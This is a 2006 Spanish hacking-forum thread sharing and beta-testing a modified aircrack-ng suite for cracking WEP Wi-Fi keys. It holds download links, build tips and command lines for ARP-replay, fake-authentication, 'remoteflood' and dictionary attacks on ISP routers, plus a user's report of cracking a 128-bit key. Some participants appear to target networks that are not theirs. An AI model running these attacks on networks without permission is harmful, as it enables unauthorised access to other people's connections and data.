Foro de elhacker.net

Seguridad Informática => Hacking Wireless => Mensaje iniciado por: thefkboss en 22 Agosto 2006, 14:22 pm



Título: Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)
Publicado por: thefkboss en 22 Agosto 2006, 14:22 pm
bueno este es un adelanto para los q me lo han pedido aun me queda para rato pero he aqui hay un par de modificaciones en  el airodump.



haber q os parece es un poco tecnico pero merece la pena
ir probandolo y me contais y ya de paso poner unas capturas.
gracias.



YA ESTA COMPLETO



aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.1[/b] (http://www.dreamers.com/leviatan/MF/aircrack-ng-0.6%20MOTHERFUCKER%20EDITION%200.1.zip)[/url]


aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.2[/color] (http://hwagm.elhacker.net/descargas/linux4/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.2.zip)

aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3[/color] (http://hwagm.elhacker.net/descargas/linux4/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3.zip)

aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3 para windows[/color] (http://www.dreamers.com/leviatan/Download/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3-win.zip)


aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.4 [/color] (http://www.bluntmen.com/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.4.zip)

aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.5 [/color] (http://www.bluntmen.com/aircrack-ng-0.6-motherfucker-0.5.tar.gz)

aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.6 [/color] (http://www.bluntmen.com/aircrack-ng-0.6-motherfucker_06.tar.gz)

aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.7 [/color] (http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_edition_07.tar.gz)

aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.8 revisada (http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_0.8_revision.tar.gz)

aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.9 (solo disponible en el wifislax-1.1 beta):

http://dreamers.com/leviatan/wifislax/wifislax-1.1-beta.iso
http://www.elhacker.info/wifislax/wifislax-1.1-beta.iso


aircrack-ng-0.7_MOTHERFUCKER_EDITION_1.1 (solo disponible en el wifislax-2.0): (http://www.comprawifi.com/public/ficheros/Wifislax/2.0/wifislax-2.0.iso)



manual aircrack-ng-0.6 original[/color] (http://hwagm.elhacker.net/htm/aircrack-ng.htm)

manual aircrack-ng-0.6 MOTHERFUCKER[/color] (http://www.seguridadwireless.net/foro/index.php/topic,490.new/boardseen.html#new)


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: Armenos en 22 Agosto 2006, 15:41 pm
Muchas gracias por el curro thefkboss  :D


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: thefkboss en 22 Agosto 2006, 16:05 pm
bueno ya he terminao lo del buffer ciclico y lo de especificar la clave ya sea comienzo final etz.
pero primero tengo q probarlo yo asi q os quedais con las ganas hasta mañana xq ahora mismo paso.

De todas formas ir probando lo q ya esta subido y comentandome yo q se fallos preguntas.lo q sea si os gusta................lo q os salga de la entrepierna.


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: rh3nt0n en 22 Agosto 2006, 16:29 pm
pues thefkboss .. no se que habras tocao ...pero lo estoy probando , y en cosa de dos minutos sin reinyectar ni nada ,llevo cerca de 3000 paketes y subiendo  :P  , en principio solo veo de nuevo el cambio en los DATA con el campo 's' me imagino que sera datas por segundo o algo asi?

una captura

(http://www.bluntmen.com/nuevo_airodump-ng_800.png)


de momento la cosa tiene muy buena pinta :) 

si te hace falta ayuda solo tienes que pedirla ...  ;)

saludos



Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: thefkboss en 22 Agosto 2006, 18:18 pm
yo no me he currado el programa digamos q son unas modificaciones q hace la peña y las postea y el q quiere las usa eso si te las dan y tu las montas.
me gusta q valla bien.

Citar
solo ves cambio en lo de los DATA con el campo `s´
jaja pues chico estas muy ciego vete a q te revisen la vista
 ;D me parto
mira el comienzo del airodump.
solo escribe airodump-ng sin ningun parametro y dime q ves

tienes la posibilidad de multiples tarjetas multiples canales usar diccionario mientras capturas (en el aire) para romper las claves(especial Imagenio) especificacion de SSID o BSSID para capturar directamente solo ese vamos q los comandos crecen de como lo conociamos.

como te has portado mal por decirme q no hay cambios aparentes( :-( )te toca postear la imagen del principio del airodump.


En cuanto a lo de capturar mas rapido se supone q le han metido un poco mas de potencia pero si dices q te suben rapido los datas espera a ver el nuevo reinyecto con buffer ciclico.
Se basa segun la teoria en un fuber de IVS q va rotando es decir los nuevos AP tardamos tanto en sacarlos porque han sido modificados para q si enviamos un par de cabezeras IVS iguales al cabo del tiempo las tire y no las admita y hay partes q no conseguimos sacar de profundiad.
Si te has fijado el airoplay-ng guarda los replay pero pocos y siempre son los mismo hasta q habres una nueva sección o si los reinyectas es decir suelen ser 4,5,o 8 pero no mas peticiones ARP identicas q tienen unas IVS de iniciacion concretos si los envias periodicamente contra el AP estos se rallan y dicen aqui pasa algo y empiezan a soltar pocos.
Pos bien uno de los tios del otro foro del Mister X se le ocurrio la idea de hacer un bufer ciclio me esplico q con los q atakas no se repitan es decir segun atakas los raplay se van cambiando el unico incomveniente es q Mister X nunca lo ha incluido porq generea archivos grandes pero para eso tenemos discos duros potentes.
Ademas creo q es la unica forma de acabar con AP rebeldes.jaja.
Pero eso mañana.jaja.haber si funciona


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: o2T7f6j2 en 22 Agosto 2006, 19:12 pm
Prometo echarle un ojo, ya lo tengo en mis manos, es que ando muy mal de tiempo últimamente.

Salu2


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: rh3nt0n en 22 Agosto 2006, 21:45 pm
si que hay cambios si  :P no se me ocurrio mirar la ayuda del comando ..ya ves tu ...  ;D ;D ;D ;D

ayuda del original ..

Código:
  Airodump-ng 0.6 - (C) 2006 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org

  usage: airodump-ng <options> <interface>

  Options:
      --ivs               : Save only captured IVs
      --gpsd              : Use GPSd
      --write    <prefix> : Dump file prefix (mandatory)
      -w                  : same as --write
      --beacons           : Record all beacons in dump file

  By default, airodump-ng hop on 2.4Ghz channels.
  You can make it capture on other/specific channel(s) by using:
      --channel <channel> : Capture on a specific channel
      -c                  : Same as --channel
      -a                  : Will hop on 5Ghz channels
      --abg               : Will hop on 2.4 and 5Ghz channels

ayuda del 'tuneao'  :P

 
Código:
 Airodump-ng 0.6 - (C) 2006 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org

  usage: airodump-ng <options> <interface>[,<interface>,...]

  Options:
      --ivs               : Save only captured IVs
      --gpsd              : Use GPSd
      --write    <prefix> : Dump file prefix (mandatory)
      -w                  : same as --write
      --beacons           : Record all beacons in dump file
      --netmask <netmask> : Filter APs by mask
      --bssid     <bssid> : Filter APs by BSSID
      --wordlist  <files> : Dict-Attack every WEP network with enough data

  By default, airodump-ng hop on 2.4Ghz channels.
  You can make it capture on other/specific channel(s) by using:
      --channel <channels>: Capture on specific channels
      -c                  : Same as --channel
      -a                  : Will hop on 5Ghz channels
      --abg               : Will hop on 2.4 and 5Ghz channels
      --cswitch  <method> : Set channel switching method
                    0     : FIFO (default)
                    1     : Round Robin
                    2     : Hop on last
      -s                  : same as --chswitch


Citar
jaja pues chico estas muy ciego vete a q te revisen la vista
 grin me parto
mira el comienzo del airodump.
solo escribe airodump-ng sin ningun parametro y dime q ves
amos ... que te quejaras de betatester ...  ;)

saludos




Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: thefkboss en 22 Agosto 2006, 22:01 pm
jaja ves como hay cambios

veo q eres un buen betatester mañana subire el resto ya lo tengo casi acabado


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: rh3nt0n en 22 Agosto 2006, 22:05 pm
sin prisa ..pero sin pausa.. ;)

gracias por tu trabajo :)

saludos


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: Hwagm en 22 Agosto 2006, 23:38 pm
sin prisa ..pero sin pausa.. ;)

gracias por tu trabajo :)

saludos

esa frase me suena. uy uy uy


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: rh3nt0n en 22 Agosto 2006, 23:43 pm
al escribirla pensé en añadir ... como diria ....
pero he comprobado que no hacia falta ...  ;D ;D ;D

saludos


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: Armenos en 22 Agosto 2006, 23:46 pm
Yo no miro a nadie  ;D Apuff quiero que compile el ***** kernel ¬¬ Necesito relax de kernel unos días, y sin linux y haciendo cosas en win ... pos no pruebo nada, por suerte tenemos al currante de rh3nt0n  :D

A ver ese manual paso a paso para las ipw2200 en linux que no te veo el pelo por el msn  ;D

Offtopic: ¿Llegó la tarjeta al final? Saludos.


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: pianista en 22 Agosto 2006, 23:48 pm
Te marca las data/seg??
Mola....
Si es que a ver si me meto Debian de una vez...Necesito verlo!!!!!!
Saludosss y gracias por la info


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: rh3nt0n en 22 Agosto 2006, 23:56 pm
Citar
A ver ese manual paso a paso para las ipw2200 en linux que no te veo el pelo por el msn  grin

Offtopic: ¿Llegó la tarjeta al final? Saludos.

si ,ya llego :P hay problemas con modo monitor ..tengo que actualizar el firmware ... pero de momento al menos navega  ;) muy liao con ello ..

respecto al manual .. afuuu  tengo que probarlo mas ..por cierto ..ya tengo ARP's :P

saludos


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: Hwagm en 23 Agosto 2006, 00:10 am
La que me espera cuando este la web online, y encima se ma acabaron las fiestas.

POr cierto 1 - 1 , jeje a bien quien lo pilla.


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: thefkboss en 24 Agosto 2006, 08:12 am
bueno ya esta terminado se llama
aircrack-ng MOTHERFUCKER EDITION.jaja
esta bastante bien ayer no se porque no pude acceder al foro lo pondre dentro de un par de horas antes de comer vamos cuando llegue a mi kasa


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: rh3nt0n en 24 Agosto 2006, 08:19 am
que ansiedad .. yo tampoco he podido entrar el foro ..  :-[

ya hay ganas de probarlo :P

saludos


Título: Re: Un adelanto aircrack-ng modificado beta version
Publicado por: thefkboss en 24 Agosto 2006, 10:19 am
bueno pues aqui esta ya
el aircrack-ng MOTHERFUCKER EDITION V.01

www.dreamers.com/leviatan/MF/aircrack-ng-0.6%20MOTHERFUCKER%20EDITION%200.1.zip


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: rh3nt0n en 24 Agosto 2006, 10:29 am
gracias ;)

esta tarde lo pruebo :)

saludos


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: thefkboss en 24 Agosto 2006, 10:35 am
***** habra q meter el parche para ipw2200.jaja pero eso en la version 0.2
Q al paso q va saldra este finde joder la gente no se podria esperar q estamos de vacaciones. :rolleyes: jaja.
bueno si encontrais algo mas q querais meter en la proxima version me lo decis.


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: pianista en 24 Agosto 2006, 10:36 am
Por fin se puede entrar!!!!
Yo tambien intentare probarlo esta tarde...
Gracias  ;D
Saludosss


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: rh3nt0n en 24 Agosto 2006, 21:58 pm
Gracias a thefkboss ...

pruebas realizadas en mi ap


posteo las capturas como me pediste ...
no sé si habre usado bien  la nueva opcion del buffer ciclico .. pero nunca habia visto subir los data  como en esta ocasion ..

la ayuda ..

Código:
[root@rh3nt0n aircrack-ng-0.6]# ./aireplay-ng

  Aireplay-ng 0.6 - (C) 2006 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org
  Thanks to: recursive and Hirte for de code
  MOTHERFUCKER EDITION V 0.1
  By thefkboss

  usage: aireplay-ng <options> <replay interface>

  filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit

  replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -e essid  : fakeauth  attack : set target AP SSID
      -j        : arpreplay attack : inject FromDS pkts
      -g value  : change ring buffer size (default: 8)

  source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  attack modes (Numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)

airodump-ng
Código:
 ./airodump-ng -c 11 -b <BSSID> -w <file> ath0  

(http://www.bluntmen.com/airodump_MF.jpg)

aireplay-ng
Código:
./aireplay-ng -3 -g 180 -r file.cap -b <bssid_ap> -h <cliente_ap> ath0 

he usado la opcion '-r' por que en primera instancia no me acorde agregar la opcion -g y ya tenia algunos ARP capturados ..  ;D ;D

(http://www.bluntmen.com/aireplay_MF.jpg)

las imagenes hablan por si mismas  ;D ;D

GRACIAS thefkboss  ;)

PD: en lo que he tardao en escribir en post ..lleva 350.000 iv's y una hora y cuarto snnifando ..
y lleva almacenadas cerca de 12.000 respuestas ARP  ::)

saludos

 

PD :  ::) ::) ::) keyfound de 128 bits en 1 hora 50 minutos IMPRESIONANTE!!

(http://www.bluntmen.com/aircrack_MF.jpg)


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Serch_Serch en 25 Agosto 2006, 00:06 am
Y los últimos drivers para los Ralink??
http://rt2x00.serialmonkey.com/wiki/index.php/Downloads

Será q tengo una Ralink..??

Salu2


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: o2T7f6j2 en 25 Agosto 2006, 01:40 am
Serch_Serch, compruébalo con lspci, eso no va aquí.

Salu2


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: thefkboss en 25 Agosto 2006, 10:41 am
un par de comandos para usay buffer ciclico

Citar
aireplay-ng -3 -b mac del AP -h mac del cliente -x 1000 -g 1.000.000 ath0

para usar bufer ciclico con unos arp guardados de capturas anteriores de una version anterio del aircrack-ng convencional

Citar
aireplay-ng -3 -b mac del AP -h mac del cliente -x 1000 -r archivo a reinyectar -g 1.000.000 ath0

Si quereis usar diccionario contra WEP si si diccionario contar WEP
Citar
aircrack-ng -w donde este el dicionario  capturas de ivs

Ya he estado compilando la nueva version la 0.2 de momento funciona con el parche para inyeccion de la IPW2200 pero habra q probarlo mas detenidamente asi q un poco de paciencia


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Serch_Serch en 25 Agosto 2006, 10:46 am
Siento colarme, pero la mia es una usb con el RT2571WF, en concreto la usb es la CNET CWD-854 u lo he probado con el hax-puppy 1.3 y nada...


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: ragtap en 25 Agosto 2006, 11:08 am
Y existe alguna posibilidad con esta nueva version de usar el diccionario que hemos creado con el wlandecrypter para obtener arp´s??

Lo digo por que el script no me funciona pese ha haberlo intentado de todas las formas posibles!!

Saludos!


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: thefkboss en 25 Agosto 2006, 14:19 pm
Si es muy sencillo lo primero necesitas el wlandecrypter y escribes este codigo

Citar
wlandecrypter {BSSID} {ESSID} {fichero_claves}
te genera un archivo y ese archivo lo usas como

Citar
aircrack-ng -w fichero_claves  capturas de ivs

y te la saca facil no


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: jur318 en 25 Agosto 2006, 15:37 pm
me podeis decr como instalarlo ?? con el make me da 50 mil errores de q no se encuentran comandos... ayuda porfavor.

gracias


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: pintuflas en 25 Agosto 2006, 15:48 pm
yo hago por ejemplo lo guardas en /usr/local/bin

y haces dentro de la carpeta make clean && make && make install


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: rh3nt0n en 25 Agosto 2006, 16:12 pm
me podeis decr como instalarlo ?? con el make me da 50 mil errores de q no se encuentran comandos... ayuda porfavor.

gracias


se instala como el original
debes de tener las sources o al menos gcc para poder compilarlo ..
Código:
unzip  aircrack-ng-0.6 MOTHERFUCKER EDITION 0.1.zip
cd aircrack-ng-0.6
make
make install

saludos


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: ragtap en 25 Agosto 2006, 16:48 pm
Hola thefkboss, si no me equicovo, lo que me  has escrito es para obtener la clave ya teniendo iv´s. pero lo que te preguntaba es si se puede usar para obtener estas.

Gracias de todas maneras por tu rapida respuesta


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Kase en 25 Agosto 2006, 18:01 pm
emm una duda  con los comandos...
ay que poner   
aircrack-ng     
o
./aircrack-ng

???  si ya tenia el aircrack-ng    este lo substituye?  o.o


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: thefkboss en 25 Agosto 2006, 18:33 pm
Hola thefkboss, si no me equicovo, lo que me  has escrito es para obtener la clave ya teniendo iv´s. pero lo que te preguntaba es si se puede usar para obtener estas.
Si es como el aircrack de toda la vida.
hay otro comando q te lo hace mas rapido es el siguiente una vez q tenemos el diccionario echo mediante el wlandecrypter

empezamos a capturar con el airodump escribimos:

Citar
airodump-ng --ivs -w archivo q vamos a capturar --bssid del AP de Imagenio  --wordlist fichero_claves  ath0


emm una duda  con los comandos...
ay que poner   
aircrack-ng     
o
./aircrack-ng

???  si ya tenia el aircrack-ng    este lo substituye?  o.o

pues es uno nuevo cuando pones
Citar
make clean && make && make install
se borra la version anterior

una pregunta alguien tiene la IPW2200 con los drivers parcheados tiene una version superior al 2.6.14 entiende del aircrack-ng ( me refiero ya sabeis a los de siempre q pilotan)
pues q me mande un privado es para probar la nueva version 0.2 con los parches de inyeccion de las IPW220 ya aplicados


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: jur318 en 25 Agosto 2006, 19:03 pm
ya consegui compilarlo i hacer q funcionara. Tengo una duda sobre el procedimiento en general, no es la primera red q lo intento pero si la unica sin exito.
La red a la q intento acceder no hay ningun cliente conectado por wifi, ahunq aveces (muy pocas) suelta algun Data, le hago el atake -1 (con una mac ficticia) y funciona (se asocia) pero solo unas 20 veces, pasadas estas veces el atake -1 ya no va ?? :huh: :huh:

Alguna sugerencia ? Es imposible si no cojo la MAC del cliente ? Creo q no tiene activado el filtro MAC porke sino el atke -1 no funcionaria ni una sola vez , no ?

Saludos y gracias


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Armenos en 25 Agosto 2006, 19:04 pm
ya consegui compilarlo i hacer q funcionara. Tengo una duda sobre el procedimiento en general, no es la primera red q lo intento pero si la unica sin exito.
La red a la q intento acceder no hay ningun cliente conectado por wifi, ahunq aveces (muy pocas) suelta algun Data, le hago el atake -1 (con una mac ficticia) y funciona (se asocia) pero solo unas 20 veces, pasadas estas veces el atake -1 ya no va ?? :huh: :huh:

Alguna sugerencia ? Es imposible si no cojo la MAC del cliente ? Creo q no tiene activado el filtro MAC porke sino el atke -1 no funcionaria ni una sola vez , no ?

Saludos y gracias

¿A cuanto coges la señal? Seguramente sa falta de potencia y/o estabilidad. Saludos.

P.d. Si hay filtrado mac, el a1 sólo se puede hacer con una mac "real".


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: jur318 en 25 Agosto 2006, 19:15 pm


:(


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: thefkboss en 25 Agosto 2006, 19:20 pm
yo he hecho el ataque con una señal de 10 si bajas de esa potencia pasa lo q tu dices.Hay veces q se desconecta.
Si tiene filtrado mac no te dejaria ademas sale un mensaje q no me acuerdo lo q pone pero pone algo de q hay filtrado


NO ME CREO Q NADIE TENGA UNA IPW2200 CON LOS DRIVERS PARCHEADOS Y EL KERNEL AZTUALIZADO Y NO QUIERA PROBAR LA SIGUIENTE VERSION CON LA POSIBILIDAD DE REINYECTAR.



ALGUNA REPUESTA????


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: jur318 en 25 Agosto 2006, 19:22 pm
pero de potencia estoy bien !


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: thefkboss en 25 Agosto 2006, 19:41 pm
si a lo mejor esta demasiado cerca tambien puede pasar
prueba a bajar el ratio


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: o2T7f6j2 en 25 Agosto 2006, 19:57 pm

NO ME CREO Q NADIE TENGA UNA IPW2200 CON LOS DRIVERS PARCHEADOS Y EL KERNEL AZTUALIZADO Y NO QUIERA PROBAR LA SIGUIENTE VERSION CON LA POSIBILIDAD DE REINYECTAR.

xD, tanta tabarra con las ipw2200 y ahora no hay testers xD

thefkboss, pon un hilo que se llame así, seguro que se ve más

Salu2


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Armenos en 25 Agosto 2006, 20:01 pm
A mi si alguien me regala una, hago de beta tester  ;D

¿Si le grabo un 2 encima de mi ipw2100 valdrá?   :D


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: thefkboss en 25 Agosto 2006, 20:04 pm
jaja a lo mejor quien sabe como no es ciencia cierta aunque yo creo q todo sigue unas reglas q las mueven unas complicados algortimos.jaja q bien me ha quedao.
pues bueno hare eso habrire un post pero ya veras como la gente empezara no me funciona, como se parchean los drivers, como se instalan,como.... voy a probar


Título: MOTHERFUCKER EDITION V.02 funciona con las IPW2200 NECESITTO TESTERS
Publicado por: thefkboss en 25 Agosto 2006, 20:10 pm
Pues haber antes de nada se necesitan unos requisitos minimos asi q los q no lo cumplan abstenerse.

1º Diponer de tarjeta IPW2200
2º Tener linux con el Kernel actuañizado lo mas posible
3º Diponer de los dirvers de las tarjetas parcheados
4º Saber como usar el aircrack-ng basico.

Ofrezco la version de prueba q funciona con las IPW2200 para reinyectar antes de q la saque mas q nada para estar seguros con pruebas bueno los interesados q posteen aqui y me pongo en contacto con ellos por privado enviadoles la nueva version para q la prueben

Joder me a quedao como un anuncion de curro.haber si alguien responde.jaja


Título: Re: MOTHERFUCKER EDITION V.02 funciona con las IPW2200 NECESITTO TESTERS
Publicado por: Puntillo en 25 Agosto 2006, 20:35 pm
Aqui tienes un Beta Tester con ipw2200 parcheada y kernel 2.6.15-26-686...

Saludos


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: ragtap en 25 Agosto 2006, 21:55 pm
Muchas gracias thefkboss!! entonces, esta es una perfecta alternativa al script de las redes de imagenio no???

Gracias una vez mas y un saludo!


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Hwagm en 25 Agosto 2006, 23:14 pm
Ya puse lo que crei necesario:

http://hwagm.elhacker.net/aircrack-ng.htm

http://hwagm.elhacker.net/linux.htm

Justaria de poner descargas directas


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Kase en 26 Agosto 2006, 04:19 am
solo como comentario.. si ya tenian instalado. el  aircrack-ng. ay que kitarlo.. sino cuando  pongan  el  motherfuker version    no les cargara los comandos...

 porlomenos asi me paso a mi... xD tube que bolber a poner el aircrack-ng.  luego hacer make clean.. y luego instalar el  aircrack-ng mother.............

o.o


Título: Re: MOTHERFUCKER EDITION V.02 funciona con las IPW2200 NECESITTO TESTERS
Publicado por: thefkboss en 26 Agosto 2006, 14:52 pm
pues bueno ya te he enviado un privado esperamos tus test


Título: Re: MOTHERFUCKER EDITION V.02 funciona con las IPW2200 NECESITTO TESTERS
Publicado por: *dudux en 26 Agosto 2006, 15:51 pm
tampoco hacen faltan las mayusculas,,,,,,,,lo vamos a leer =
 ;)


Título: Re: MOTHERFUCKER EDITION V.02 funciona con las IPW2200 NECESITTO TESTERS
Publicado por: thefkboss en 26 Agosto 2006, 16:00 pm
no es por eso es q la gente estaba muy pesada con lo de tengo la IPW2200 como inyecto se puede y venga a y cuando sacan un parche q puedo hacer y bla bla bla y ahora lo pongo q se puede y nadie me responde  que lo quiera probar menos Puntillo y por eso lo de las mayusculas haber si alguien se decide


Título: Re: MOTHERFUCKER EDITION V.02 funciona con las IPW2200 NECESITTO TESTERS
Publicado por: *dudux en 26 Agosto 2006, 16:39 pm
Simplemente lo digo.....pero bueno

yo tengo la ipw2200 y aun no consegui parchear correctamente...por eso no posteo :(

haber si "puntillo" se curra una ayudita.........


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Er_mora en 26 Agosto 2006, 19:53 pm
Hola buenas,

A mi me pasa como a jur318. Al hacer make me da mil errores y avisos.

He instalado el make, gcc y los headers y aún así me sigue dando los mismos errores.

He seguido las instrucciones de pintuflas (make clean && make && make install) y nada, sigo igual.

¿Qué puedo estar haciendo mal? Uso Ubuntu 6.06.1

Espero respuestas, Muchas Gracias!


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Armenos en 26 Agosto 2006, 20:32 pm
Hola buenas,

A mi me pasa como a jur318. Al hacer make me da mil errores y avisos.

He instalado el make, gcc y los headers y aún así me sigue dando los mismos errores.

He seguido las instrucciones de pintuflas (make clean && make && make install) y nada, sigo igual.

¿Qué puedo estar haciendo mal? Uso Ubuntu 6.06.1

Espero respuestas, Muchas Gracias!

Si indicaras que errores y avisos te salen podrían ayudarte mejor. ¿Hiciste todo con sudo delante no? Saludos y suerte.


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Er_mora en 26 Agosto 2006, 20:42 pm
Sí, lo hice todo con sudo. No soy muy ducho en Linux así q no sé como copiar la burrada de lineas q me salen. El scroll de la consola se queda pequeño, he probado tb ha hacer sudo make>errores pero solo me guarda la primera línea. ¿Algún consejo?

Gracias


Título: Re: Un adelanto aircrack-ng modificado beta version (ya esta terminado)
Publicado por: Er_mora en 26 Agosto 2006, 22:18 pm
Problema resuelto gracias a Armenos. NO OLVIDEIS INSTALAR EL PAQUETE build-essential ANTES DE PONERSE A COMPILAR NADA :)


Título: Ataque -5 remoteflood estara disponoble en MOTHERFUCKER EDITION 0.2
Publicado por: thefkboss en 28 Agosto 2006, 08:39 am
Bueno pues ya esta terminado ahora lo probare y cuando lo tenga mas q probado lo sacare incluye un nuevo ATAQUE (ataque -5 ó "--remoteflood)

Para q sirve
aireplay usa una keystream (xor) para enviar un paquete udp encpriptado a un host remoto. el host remoto esta montado sobre un servidor, esperando un paquete para reenviar un numero especifico de paquetes por segundo de vuelta. Es muy efectivo.Se puede capturar mas de 1800 packetes/segundo con este ataque. La transferencia usada es server/client 1MBit/seg or 110KByte/seg. A esta velocidad se puede capturar 100.000 paqutes en  54segundos 1 million paquetes en 9 minutos.

El ataque requieres (-a), AP  mac (-h), a dest mac (-c), a origen ip (-k), a dest ip (-l), a xor f (-y) argumento  -o (para enviar los bit correspondientes)
Citar
aireplay-ng -5 -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -k <srcIP[:port]> -l <destIP[:port]> -o <iface>

hasta aqui la teoria ahora hay q probarlo


Título: Re: Ataque -5 remoteflood estara disponoble en MOTHERFUCKER EDITION 0.2
Publicado por: longits en 28 Agosto 2006, 09:24 am
una estupenda noticia thefkboss. muchisimas gracias. ¿funcionará con todos los AP's o algunos seran invulnerables?

saludos.


Título: Re: Ataque -5 remoteflood estara disponoble en MOTHERFUCKER EDITION 0.2
Publicado por: thefkboss en 28 Agosto 2006, 09:31 am
se supone q en teoria debe funcionar pero luego cada AP es un mundo yo lo probare en los q pueda y contare mi esperiencia.pero vamos se vasa en un ataque chop-chop pero modificado es decir codigo nuevo.
y una vez obtenido el chop-chop hay q relaizar este ataque.
segun su autor ha sido probado en 12 AP con resultado satisfactorio


Título: Re: Ataque -5 remoteflood estara disponoble en MOTHERFUCKER EDITION 0.2
Publicado por: nilp0inter en 28 Agosto 2006, 10:27 am
Una pregunta, sabes si este nuevo ataque esta basado en los ataques de fragmentacion?

http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/4

Saludos!


Título: Re: Ataque -5 remoteflood estara disponoble en MOTHERFUCKER EDITION 0.2
Publicado por: thefkboss en 28 Agosto 2006, 11:11 am
si se basa en eso


Título: Re: Ataque -5 remoteflood estara disponoble en MOTHERFUCKER EDITION 0.2
Publicado por: nilp0inter en 28 Agosto 2006, 11:14 am
Gracias, no sabia que hubiera ninguna implementacion de este tipo de ataques aparte de wesside para FreeBSD.

Ya se puede descargar de algun sitio esta nueva version o algun parche? Es que estoy deseoso de probarlo xD


Título: Aicrack-ng MOTHERFUCKER EDITION V 0.2 (Ya disponible)
Publicado por: thefkboss en 28 Agosto 2006, 14:06 pm



entre la nuevas caracteristicas:
*sirve para las IPW2200 (gracias Puntillo por decirme lo del fallo ya esta corregido)
*PRGA Y WEPWedgie implementado
*Ataque -5 remoteflood

para usar este ultimo recordad q teneis q usasr antes el chop-chop y luego el codigo es el siguiente

Citar
